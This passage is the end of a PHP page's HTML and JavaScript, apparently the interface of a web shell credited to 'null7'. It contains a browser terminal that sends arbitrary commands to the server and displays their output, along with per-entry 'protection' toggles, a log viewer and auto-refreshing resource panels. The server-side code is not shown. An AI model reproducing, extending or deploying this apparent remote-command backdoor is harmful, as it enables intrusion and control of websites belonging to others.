                <h2><i class="fas fa-clipboard-list"></i> System Log</h2>
                <pre style="max-height: 400px; overflow-y: auto; background: var(--log-bg); padding: 15px; border-radius: 6px;">
                    <?= file_exists(LOG_FILE) ? htmlspecialchars(file_get_contents(LOG_FILE)) : 'Log file is empty' ?>
                </pre>
            </div>
            
            <div class="footer">
                <p>Copyright © <?= date('Y') ?> by null7 | Contact: <a href="mailto:null7ganteng@gmail.com">null7ganteng@gmail.com</a></p>
            </div>
        </div>
    
    <script>
        document.documentElement.setAttribute('data-theme', '<?= $current_theme ?>');
        
        document.addEventListener('DOMContentLoaded', function() {
            // Tab system
            const tabs = document.querySelectorAll('.tab');
            tabs.forEach(tab => {
                tab.addEventListener('click', function() {
                    document.querySelectorAll('.tab').forEach(t => t.classList.remove('active'));
                    document.querySelectorAll('.tab-content').forEach(c => c.classList.remove('active'));
                    
                    this.classList.add('active');
                    const tabId = this.getAttribute('data-tab');
                    document.getElementById(`${tabId}-tab`).classList.add('active');
                });
            });
            
            // Terminal form submission
            const terminalForm = document.getElementById('terminal-form');
            if (terminalForm) {
                terminalForm.addEventListener('submit', function(e) {
                    e.preventDefault();
                    const command = document.getElementById('terminal-command').value;
                    const output = document.getElementById('terminal-output');
                    
                    output.innerHTML += `$ ${command}\n`;
                    
                    fetch(window.location.href, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/x-www-form-urlencoded',
                        },
                        body: `command=${encodeURIComponent(command)}`
                    })
                    .then(response => response.text())
                    .then(html => {
                        const parser = new DOMParser();
                        const doc = parser.parseFromString(html, 'text/html');
                        const newTerminal = doc.getElementById('terminal-output');
                        if (newTerminal) {
                            output.innerHTML = newTerminal.innerHTML;
                        }
                        output.scrollTop = output.scrollHeight;
                    })
                    .catch(error => {
                        output.innerHTML += `Error: ${error}\n`;
                        output.scrollTop = output.scrollHeight;
                    });
                    
                    document.getElementById('terminal-command').value = '';
                });
            }
            
            // Toggle protection
            const toggleButtons = document.querySelectorAll('.toggle-protection');
            toggleButtons.forEach(button => {
                button.addEventListener('click', function(e) {
                    e.preventDefault();
                    const id = this.getAttribute('data-id');
                    const row = this.closest('tr');
                    const statusCell = row.querySelector('.status-cell span');
                    
                    fetch(`?toggle=1&id=${id}`, {
                        headers: {
                            'X-Requested-With': 'XMLHttpRequest'
                        }
                    })
                    .then(response => response.json())
                    .then(data => {
                        if (data.status === 'success') {
                            this.textContent = data.active ? 'Deactivate' : 'Activate';
                            statusCell.className = data.active ? 'status-active' : 'status-inactive';
                            statusCell.textContent = data.active ? 'ACTIVE' : 'INACTIVE';
                        }
                    })
                    .catch(error => {
                        console.error('Error:', error);
                        window.location.href = `?toggle=1&id=${id}`;
                    });
                });
            });
            
            // Auto-refresh log and resources
            setInterval(() => {
                fetch(window.location.href, {
                    headers: {
                        'X-Requested-With': 'XMLHttpRequest'
                    }
                })
                .then(response => response.text())
                .then(html => {
                    const parser = new DOMParser();
                    const doc = parser.parseFromString(html, 'text/html');
                    const newLog = doc.querySelector('.card:last-child pre');
                    if (newLog) {
                        document.querySelector('.card:last-child pre').textContent = newLog.textContent;
                    }
                    const newResources = doc.querySelector('.resource-monitor');
                    if (newResources) {
                        document.querySelector('.resource-monitor').innerHTML = newResources.innerHTML;
                    }
                })
                .catch(error => console.error('Error refreshing:', error));
            }, 30000);
            
            // Session timeout warning
            let timeoutWarning = setTimeout(() => {
                alert('Your session will expire soon. Please interact with the page to continue.');
            }, (<?= SESSION_TIMEOUT ?> - 60) * 1000);
            
            // Reset timeout on user interaction
            document.addEventListener('click', () => {
                clearTimeout(timeoutWarning);
                timeoutWarning = setTimeout(() => {
                    alert('Your session will expire soon. Please interact with the page to continue.');
                }, (<?= SESSION_TIMEOUT ?> - 60) * 1000);
            });
        });
    </script>
</body>
</html>